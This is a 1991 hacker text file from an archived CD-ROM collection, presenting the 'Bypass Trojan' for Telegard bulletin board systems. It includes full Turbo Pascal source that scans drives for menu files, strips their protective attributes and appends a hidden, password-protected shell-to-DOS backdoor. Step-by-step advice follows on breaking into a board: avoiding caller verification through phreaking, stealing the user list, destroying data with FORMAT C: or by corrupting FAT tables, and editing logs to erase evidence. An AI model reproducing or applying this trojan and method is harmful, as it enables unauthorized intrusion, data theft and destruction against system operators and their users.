home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 2 / HACKER2.BIN / 335.DATA.EXE / TEXT21.TXT < prev    next >
Text File  |  1991-10-18  |  6KB  |  180 lines

  1. ──────────────────────> Bypass Trojan v1.0 and v2.0 :
  2.  
  3.  Created by: Mechanix
  4.  Released  : October 1991
  5.  
  6.  Introduction:
  7.  
  8.     Well this is basically another backdoor creator for Telegard Systems. This
  9.  one is relatively fullproof except for the fact that it requires REMOTE.BAT to
  10.  exist on the target system, or it will not function properly. However, the
  11.  Bypass Trojan v2.0 takes care of this problem as it creates REMOTE.BAT on the
  12.  target system, if it doesn't exist already. This is why I am also releasing
  13.  the source (in Turbo Pascal) to the Bypass Trojan v1.0. You will find the
  14.  source after the description.
  15.  
  16.  Description:
  17.  
  18.     This trojan will scan all directories on drives C: to E: in search of the
  19.  MAIN.MNU file. Then it will append a few lines to the file as to create a
  20.  hidden command to shell to DOS. It also checks to see if the MAIN.MNU file is
  21.  Read-Only or Hidden, and will remove these attributes long enough to make the
  22.  changes. It will also check for write-protection. The source can also be
  23.  changed as to modify any of the .MNU files.
  24.  
  25.  Notes:
  26.  
  27.     This trojan uses a basic Turbo Pascal cycle to scan all directories and
  28.  files, and thus the source can be modified for a number of uses. As for a good
  29.  procedure to nail the board once the shell to DOS command has been
  30.  implemented, I recommend the following:
  31.   - First and foremost, use a PBX or other phreaking trick to avoid the
  32.     annoying Maestro phone.
  33.   - Call preferably around 4-5 am, when the SysOp is almost sure not to be
  34.     around.
  35.   - Use the shuttle password (if there is one) and then apply as a NEW user
  36.     after you have bypassed the shuttle password. This will usually bypass CBV
  37.     utilities.
  38.   - Shell to DOS in the correct menu.
  39.   - Turn your capture mode on, as to record everything you see.
  40.   - Go get the user list and ZIP it up with another ZIP file that is already
  41.     online. This way you can D/L it later when you log on again. Or capture it
  42.     through a text file viewing utility if you find one on the system.
  43.   - If you don't want the user list, and just want to crash the board, then
  44.     FORMAT C: should do the trick. Or uses DEBUG to rearrange his FATs. Or if
  45.     it's a H/P board, use one of the online virii or trojans to screw him. That
  46.     will teach him, and you get to test them out.
  47.   - If you decide to only take the user list and let the board live, then go
  48.     edit the logs as to remove all evidence of your actions. If there's a spool
  49.     to printer log, you're in trouble.
  50.   - If you could not bypass CBV, then find that utility's log and edit out
  51.     your number.
  52.   - Lastly, take off the DOS shell command from the menu you modified in the
  53.     first place, unless you want to use it again, but this is risky.
  54.  
  55.  Well that's the method I've been using, but the choice is your's.
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  Source:
  62.  
  63. PROGRAM BYPASS1;
  64. { Bypass Trojan v1.0                                                          }
  65. { Created by: Mε¢HÆ∩!X [NuKE]                                                 }
  66. { Created on: 27/09/91                                                        }
  67. USES DOS;
  68. VAR
  69.  Target  : SEARCHREC;
  70.  T       : TEXT;
  71. PROCEDURE DIRECT   (PATH : STRING);
  72. VAR
  73.  PATH2    : STRING;
  74.  INFO     : SEARCHREC;
  75.  INFO2    : SEARCHREC;
  76.  F        : TEXT;
  77. BEGIN
  78.  Findfirst (PATH + '\*.*',$10,INFO);
  79.  WHILE DOSERROR = 0 DO
  80.   BEGIN
  81.    IF (INFO.ATTR = $10) AND (INFO.NAME[1] <> '.') THEN
  82.     Begin
  83.      PATH2 := PATH + '\' + INFO.NAME;
  84.       Chdir (PATH2);
  85.        Findfirst ('MAIN.MNU',($3F - $10),INFO2);       { Or any .MNU you wish }
  86.        WHILE DOSERROR = 0 DO
  87.         Begin
  88.          ASSIGN (F,INFO2.NAME);
  89.          Setfattr (F,$20);
  90.          Append (F);
  91.          Writeln (F,' ');
  92.          Writeln (F,' ');
  93.          Writeln (F,'#');                                        { Key to add }
  94.          Writeln (F,' ');
  95.          Writeln (F,'-$');
  96.          Writeln (F,'NUKEWAR;PW: ;^8WRONG - access denied!');      { Password }
  97.          Writeln (F,' ');
  98.          Writeln (F,' ');
  99.          Writeln (F,' ');
  100.          Writeln (F,'#');                                        { Key to add }
  101.          Writeln (F,' ');
  102.          Writeln (F,'D-');
  103.          Writeln (F,'REMOTE.BAT');
  104.          Close (F);
  105.          Findnext(INFO2);
  106.        End;
  107.       DIRECT (PATH2);
  108.     End;
  109.    Findnext(INFO);
  110.   End;
  111.  END;
  112. PROCEDURE FILEFIND (DRIVE : CHAR);
  113. BEGIN
  114.  Chdir (DRIVE + ':\');
  115.  Findfirst ('MAIN.MNU',($3F - $10),Target);            { Or any .MNU you wish }
  116.  WHILE DOSERROR = 0 DO
  117.   Begin
  118.    ASSIGN (T,Target.name);
  119.    Setfattr (T,$20);
  120.    {$I-}
  121.    Append (T);
  122.    {$I+}
  123.    IF IORESULT = 0 THEN
  124.     Begin
  125.      Writeln (T,' ');
  126.      Writeln (T,'#');                                            { Key to add }
  127.      Writeln (T,' ');
  128.      Writeln (T,'-$');
  129.      Writeln (T,'NUKEWAR;PW: ;^8WRONG - access denied!');          { Password }
  130.      Writeln (T,' ');
  131.      Writeln (T,' ');
  132.      Writeln (T,' ');
  133.      Writeln (T,'#');                                            { Key to add }
  134.      Writeln (T,' ');
  135.      Writeln (T,'D-');
  136.      Writeln (T,'REMOTE.BAT');
  137.      Close (T);
  138.     End
  139.    ELSE
  140.     Exit;
  141.    Findnext (Target);
  142.   End;
  143.  DIRECT  (DRIVE + ':');
  144. END;
  145. BEGIN
  146.  {$I-}
  147.  Chdir ('C:\');
  148.  {$I+}
  149.  IF IORESULT = 0 THEN
  150.   FILEFIND ('C');
  151.  {$I-}
  152.  Chdir ('D:\');
  153.  {$I+}
  154.  IF IORESULT = 0 THEN
  155.   FILEFIND ('D');
  156.  {$I-}
  157.  Chdir ('E:\');
  158.  {$I+}
  159.  IF IORESULT = 0 THEN
  160.   FILEFIND ('E');
  161. END.
  162.  
  163.     Well there it is. Please feel free to improve it in anyway you like. I will
  164.  soon release the source to Bypass Trojan v2.0 which checks for REMOTE.BAT and
  165.  creates one if needed. The REMOTE.BAT file also has the Hidden attribute to
  166.  try and hide it from the SysOp. The reason for this, is that smart SysOps, and
  167.  any of those who are reading this, rename the REMOTE.BAT or remove it, to
  168.  avoid this sort of trojan. The original release is for a modem on Com2. If you
  169.  wish to have the trojan for another device, either edit it in the .EXE, or
  170.  contact me (Mechanix) on any [NuKE] board, and I will recompile the source for
  171.  you with another device.
  172.  
  173.  
  174.  
  175.  
  176.  
  177.  
  178.  
  179.  
  180.  Mechanix [NuKE]